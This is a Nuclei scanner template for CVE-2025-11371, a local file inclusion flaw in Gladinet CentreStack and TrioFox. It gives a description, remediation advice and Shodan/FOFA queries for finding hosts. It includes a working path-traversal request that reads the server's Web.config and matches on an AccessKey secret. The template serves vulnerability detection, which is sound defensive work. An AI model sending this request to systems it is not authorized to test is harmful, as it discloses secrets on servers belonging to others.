id: CVE-2025-11371 info: name: Gladinet CentreStack & TrioFox - Local File Inclusion author: Kazgangap severity: medium description: | In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560 impact: | Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage. remediation: | Update to a version later than 16.7.10368.56560 or the latest available version. reference: - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html - https://nvd.nist.gov/vuln/detail/CVE-2025-11371 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.2 cve-id: CVE-2025-11371 cwe-id: CWE-552 epss-score: 0.67647 epss-percentile: 0.98604 metadata: verified: true max-request: 1 shodan-query: title:"CentreStack" fofa-query: "CentreStack - Login" tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev http: - raw: - | GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body, "", "", "AccessKey")' - 'contains(content_type, "application/octet-stream")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100cce46fc004cf040314e21574831f44851adce6addeeebc13da52f9a73819fd93022046f76d791186ef03b3e318bdc2492f54d5ddcca30b6d61a9b872bdb2bdfd02d1:922c64590222798bb761d5b6d8e72950